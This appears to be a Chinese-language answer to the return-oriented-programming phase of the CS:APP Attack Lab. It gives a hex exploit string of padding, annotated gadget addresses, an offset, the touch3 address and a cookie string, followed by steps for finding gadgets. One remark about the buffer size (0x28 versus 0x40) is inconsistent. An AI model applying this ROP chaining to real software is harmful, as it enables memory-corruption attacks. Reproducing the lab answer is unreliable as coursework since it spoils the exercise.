答案之一:
00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
00 00 00 00
06 1a 40 00 /* 1 <addval_190> movq %rsp,%rax */
00 00 00 00
a2 19 40 00 /* 2 <addval_273> movq %rax,%rdi */
00 00 00 00
ab 19 40 00 /* 3 <addval_219> popq %rax */
00 00 00 00
48 00 00 00 /* bias */
00 00 00 00
dd 19 40 00 /* 4 <getval_481> movl %eax,%edx */
00 00 00 00
69 1a 40 00 /* 5 <getval_311> movl %edx,%ecx */
00 00 00 00
13 1a 40 00 /* 6 <addval_436> movl %ecx,%esi */
00 00 00 00
d6 19 40 00 /* 7 <add_xy> lea (%rdi,%rsi,1),%rax */
00 00 00 00
a2 19 40 00 /* 8 <addval_273> movq %rax,%rdi */
00 00 00 00
fa 18 40 00 /* address of function touch3 */
00 00 00 00
35 39 62 39 /* cockie string */
39 37 66 61
00
总结一下步骤:
1. 反汇编,把汇编代码拷贝到IDE中
2. 搜索指令关键字,找出所有能够使用的代码片段,并记录在纸上
3. 考虑指令的相互组合,分析破解方法。可以发现,有关rsp的语句和popq的语句很少,而它们又必不可少,由此找到突破口
4. 先按顺序写好指令,再计算bias。这里的计算非常容易出错,要注意把%rsp拷贝给%rax的时候,%rsp已经比原来增加了0x28+0x8(0x40是程序分配的字符串缓冲区大小,0x8是执行一次ret后的效果)
